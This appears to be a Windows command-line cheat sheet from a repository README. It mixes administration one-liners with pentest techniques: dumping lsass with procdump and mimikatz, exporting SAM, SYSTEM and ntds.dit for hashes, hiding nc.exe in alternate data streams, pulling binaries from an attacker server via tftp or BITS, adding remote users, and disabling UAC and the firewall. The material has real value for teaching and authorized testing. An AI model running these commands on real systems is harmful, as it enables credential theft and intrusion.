Windows one line commands that make life easier, shortcuts and command line fu.
Windows one line commands that make life easier, shortcuts and command line fu.
Apps
, with read access & limit to 10 conns
Advanced
tab selected
dir
command to find Alternate Data Streams
procdump
to obtain the lsass
process memory
mimikatz
in minidump
mode & use mini.dmp
from procdump
ips.txt
& see live hosts
MS15_034
VENOM
detection on VirtualBox
C:\>netsh interface ipv4 show neighbors
C:\>netsh wlan show networks mode=b
Save the following in ip.bat
in %PATH%
C:\>ipconfig | find /I "pv"
Call ip
from CLI
for /F "tokens=2* delims= " %i in ('sc query ^| find /I "ce_name"') do @sc qc %i %j
C:\>reg save HKLM\SAM "%temp%\SAM.reg"
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
bcdedit /set bootlog yes
Read via %windir%\ntbtlog.txt
PS C:\>Checkpoint-Computer -description "Restore point!"
C:\> whoami /priv | findstr "Debug"
For all privs:
C:\> whoami /priv
C:\>net user test /active:yes (no)
Get full help on the net user command:
C:\>net help user
PS C:\> (Get-Process | Sort-Object -Descending WS)[0]
C:\>type data.txt > C:\windows\explorer.exe:newads.txt
C:\> tasklist /FO CSV > tasks.txt
C:\> rundll32 user32.dll,LockWorkStation
C:\> explorer /select,C:\MyData\sample.docx
C:\>vboxmanage debugvm "WinXPLab1" dumpguestcore --filename winxplab1.elf
C:\> tzutil /s "Eastern Standard Time"
List available Time zones:
C:\> tzutil /l
VirtualBox
C:\> vboxmanage guestcontrol "WinXP" md "C:\\test" --username "user" --password "pass"
C:\> psexec @$ips.txt -s -u adminuser -p pass -f -c \exploits\mp.exe
Apps
, with read access & limit to 10 connsC:\> net share Apps=C:\Apps /G:everyone,READ /US:10
C:\> fsutil.exe fsinfo drives
C:\> pathping -n www.google.com
For system wide list, remove the process name
C:\> listdlls -u explorer.exe
Server2008
PS C:\> Get-ADComputer -filter {OperatingSystem -like "*XP*"}
Advanced
tab selectedChange the number for different tabs
C:\> control sysdm.cpl,,3
dir
command to find Alternate Data StreamsC:\> dir /R | find ":$D"
Using streams sysinternals
(shows path):
C:\> streams -s .
procdump
to obtain the lsass
process memory.Use mimikatz
minidump
to get passwords
C:\> procdump -accepteula -ma lsass.exe mini.dmp
mimikatz
in minidump
mode & use mini.dmp
from procdump
mimikatz # sekurlsa::minidump mini.dmp
mimikatz # sekurlsa::logonPasswords
```
### Get list of startup programs using wmic
C:> wmic startup list full
### Add a binary to an Alternate Data Stream
C:> type c:\tools\nc.exe > c:\nice.png:nc.exe
Execute it (XP/2K3):
C:> start c:\nice.png:nc.exe
### Execute a binary Alternate Data Stream Win 7/2008 using wmic
C:> wmic process call create C:\nice.png:nc.exe
### Show config & state info for Network Access Protection enabled client
https://technet.microsoft.com/en-us/library/cc730902(v=ws.10).aspx
C:> netsh nap client show configuration
### Get computer system information, including domain name and memory, using wmic
C:> wmic computersystem list /format:csv
### Use the Package Manager in Windows to install the Telnet client on Windows Vista & higher
C:> pkgmgr /iu:"TelnetClient"
### Secure delete a file/folder in Windows
**Sysinternals**
C:> sdelete -p 10 a.txt
To recursively delete folders:
C:> sdelete -10 -r C:\data\
### Show all startup entries while hiding Microsoft entries. CSV output
**It covers more locations than Windows inbuilt tools**
C:> autorunsc -m -c
### Download files via commandline using PS
PS C:> ipmo BitsTransfer;Start-BitsTransfer -Source http://foo/nc.exe -Destination C:\Windows\Temp\
### Fetch the last 10 entries from the Windows Security event log, in text format
C:> wevtutil qe Security /c:10 /f:Text
**def is XML**
### Create a dll that runs calc on invoke
msfpayload windows/exec cmd=calc.exe R | msfencode -t dll -o rcalc.dll
C:> rundll32.exe rcalc.dll,1
### Run a command as another user
**You will be prompted for password**
C:> runas /noprofile /user:domain\username "mmc wf.msc"
### Get shutdown/reboot events from the last 1000 log entries using PS
Get-EventLog -log system -n 1000 | Where {$_.eventid -eq '1074'} | fl -pr *
### Create a new snapshot of the volume that has the AD database and log files
C:> ntdsutil sn "ac i ntds" create quit quit
### Mount the snapshot
**Copy ntds.dit from snapshot & System hive from reg for pwd hashes**
C:> ntdsutil snapshot "list all" "mount 1" quit quit
### Run a process on a remote system using wmic
C:> wmic /node:ip process call create "net user dum dum /add"
### List the machines, with usernames, that were connected via RDP
C:> reg query "HKCU\Software\Microsoft\Terminal Server Client\Servers" /s
### List all process that are running on your system by remote users connected via RDP
C:> query process *
### Reset the Windows TCP\IP stack
netsh int ip reset c:\tcpresetlog.txt
### List logged on users.
**Very useful during a pentest to look for domain admins**
C:> net session | find "\"
### Set a static IP on a remote box
C:> wmic /node:remotebox nicconfig where Index=1 call EnableStatic ("192.168.1.4"), ("255.255.255.0")
### Bypass powershell execution policy restrictions
PS C:> powershell -ExecutionPolicy Bypass -Noninteractive -File .\lastboot.ps1
### List running processes every second on a remote box
C:> wmic /node:target process list brief /every:1
**Remove `/node:target` for localhost**
### Get a list of running processes and their command line arguments on a remote system
C:> wmic /node:target process get commandline, name
### Remotely enable and start the Volume Shadow Copy Service
C:> sc \target config vss start= auto C:> sc \target start vss
### Ping multiple IPs from `ips.txt` & see live hosts
C:>for /F %i in (ips.txt) do ping -n 1 %i | find "bytes="
### Set global proxy in Windows to point to IE proxy
C:> netsh winhttp import proxy source=ie
### Enumerate list of drivers with complete path information
C:> driverquery /FO list /v
### View Group Policy Objects that have been applied to a system
**Very useful during pentests**
C:> gpresult /z /h outputfile.html
### Reset the WMI repository to what it was when the OS was installed
**Very helpful if you have a corrupt repo**
C:> winmgmt /resetrepository
### Create symbolic links in Windows Vista, 7 & higher
C:> mklink
### Enable the tftp client in Vista & higher
C:> ocsetup TFTP /quiet
Pull files to a `compromised server`:
C:> tftp -i attacksrv get bin.exe
### Obtain list of firewall rules on a local system
C:> netsh advfi fi sh rule name=all
**Can be combined with wmic for remote systems**
### Get name of current domain controller
C:> set log C:> nltest /dcname:DOMAIN
Get list of all DCs:
C:> nltest /dclist:DOMAIN
### Look at content cached in kernel mode on IIS 7 and higher
C:> netsh http sh ca
**Useful when investigating the `MS15-034` HTTP.sys vuln**
### Quick test to check `MS15_034`
C:> curl -v -H "Range: bytes=234234-28768768" "http://host/a.png" -o a.png
**HTTP 416 = Vulnerable**
**HTTP 20X = Not vulnerable**
### Get a list of all open Named pipes via Powershell
PS C:> [http://System.IO.Directory ]::GetFiles("\.\pipe\")
### Possible `VENOM` detection on VirtualBox
C:> vboxmanage list -l vms > a.txt
**Search 'Storage' & 'Floppy'**
### List RDP sessions on local or remote in list format
PS C:> qwinsta /server: | foreach {($_.trim() -replace "\s+",",")} | ConvertFrom-Csv
### Get a list of service packs & hotfixes using wmic for remote systems listed in file
C:> wmic /node:@file /output:out.txt qfe list full
### Export wireless connection profiles
C:> netsh wlan export profile
**`key=clear` allows plain text passwords**
### Unzip using PowerShell
PS C:> Add-Type -A System.IO.Compression.FileSystem;[IO.Compression.ZipFile]::ExtractToDirectory(src,dst)
### Open the Network & Sharing center
control.exe /name Microsoft.NetworkandSharingCenter
**Create a shortcut of this as `ns` in `PATH` for ease**
### Remotely stop/start ftp on several systems
C:> wmic /node:@ips.txt /user:u /password:p process call create "net
### To quickly find large files using cmd
C:> forfiles /s /c "cmd /c if @fsize gtr 100000 echo @path @fsize bytes"
**Run from the dir you want**
### Print RDP connections
for /f "delims=" %i in ('reg query "HKCU\Software\Microsoft\Terminal Server Client\Servers"') do reg query "%i"
### List scheduled tasks & binaries
C:> schtasks /query /fo LIST /v
**Weak permissions can be exploited for `localprivilege escalation`**
### Display the "Stored User names and Passwords" window
C:> rundll32 keymgr.dll,KRShowKeyMgr
### List namespaces & classes in WMI via PowerShell
PS C:> gwmi -n root -cl __Namespace | Select name
PS C:> gwmi -n root\cimv2 -li
### Convert Between VDI, VMDK, VHD, RAW disk images using VirtualBox
C:> vboxmanage clonehd myvdi.vdi myvmdk.vmdk --format VMDK
### Change file extensions recurseively
**csv to xls for eg**
C:\Projects> forfiles /S /M *.csv /C "cmd /c ren @file @fname.xls"
### List IPs of running VirtualBox machines
for /F %i in ('VBoxManage list runningvms') do VBoxManage guestproperty enumerate %i | find "IP"
### Windows Privilege Escalation
[![Windows Privilege Escalation](images/windows-privilege-esclation.png)](http://www.slideshare.net/riyazwalikar/windows-privilege-escalation)
### Enumerate packages with their oem inf filenames
C:> pnputil -e
### Install a driver package using inf file
C:> pnputil -i -a path_to_inf
### Malware Hunting with Mark Russinovich and the Sysinternals
[![Malware Hunting with Mark Russinovich and the Sysinternals Tools](http://img.youtube.com/vi/80vfTA9LrBM/0.jpg)](https://www.youtube.com/watch?v=80vfTA9LrBM)
### Windows Nano Server APIs
[https://msdn.microsoft.com/en-us/library/mt588480(v=vs.85).aspx](https://msdn.microsoft.com/en-us/library/mt588480(v=vs.85).aspx)
### Windows wifi hotspot using cmd
Starting a wifi hotspot using Windows cmd with ssid name `hotspotname` and key `password`
![Windows wifi hotspot using cmd](images/wifihotspot.jpg)
### Disable UAC via cmdline
C:> reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v EnableLUA /t REG_DWORD /d 0 /f
### Turn off Windows firewall for all profiles
**Useful if you have a bind shell**
C:> netsh advfirewall set allprofiles state off
### List Missing Updates
PS C:> (New-Object -c Microsoft.Update.Session).CreateUpdateSearcher().Search("IsInstalled=0").Updates|Select Title
### Export SAM and SYSTEM Dump password hashes offline
C:>reg save HKLM\SAM SAM C:>reg save HKLM\SYSTEM SYSTEM
### Convert Binary to base64 string to transfer across restricted RDP
PS C:> [Convert]::ToBase64String((gc -Pa "a.exe" -En By))
### Convert Base64 string to Binary
PS C:> sc -Path "a.exe" -Val ([Convert]::FromBase64String((gc -Pa "b64.txt" ))) -En By
### List services running as SYSTEM and possibly weak file permissions
wmic service where StartName="LocalSystem"|findstr /IV ":\WIN :\PROG"
### Check Bitlocker status on a remote box
manage-bde -status -cn
Use `wmic /node:@ips.txt` & `process` alias for multiple.
### Export failed logon attempts
PS C:> Get-EventLog -Log Security | ?{$_.EntryType -eq 'FailureAudit'} | epcsv log.csv
### Alternate Data Streams and PS
- List all ADS for all files in current dir
PS C:> gi * -s *
- Read ADS
PS C:> gc
- Create ADS using text input
PS C:> sc
- Delete ADS
PS C:> ri
### Run the Windows Assessment tool for cpu and ram and disk
C:> winsat cpuformal -v C:> winsat memformal -v C:> winsat diskformal -v
### Port forward (proxy) traffic to remote host and port
C:> netsh int p add v4tov4 <LPORT> <RHOST> [RPORT] [LHOST]
### Enable/Disable NetBIOS over TCP/IP
Step 1. Get Index of Network Adapter: C:> wmic nicconfig get caption,index
Step 2. Use the index C:> wmic nicconfig where index=1 call SetTcpipNetbios 1
0-Def 1-En 2-Dis
### Compact multiple VDI files across folders
C:> for /F %i in ('dir /b /s *.vdi ^| find ".vdi"') do vboxmanage modifyhd --compact %i
### Full scan using WinDefender
C:>"%ProgramFiles%\Windows Defender\MpCmdRun.exe" -scan -scantype 2
Use #wmic /node:@ips process for multiple.
### Generate 32 char random password
Save as genpass.ps1
PS C:> (char[]|sort{Get-Random})[0..32] -join ''
---
## Contribution
Please read the [contribution guidelines](CONTRIBUTING.md) if you want to contribute.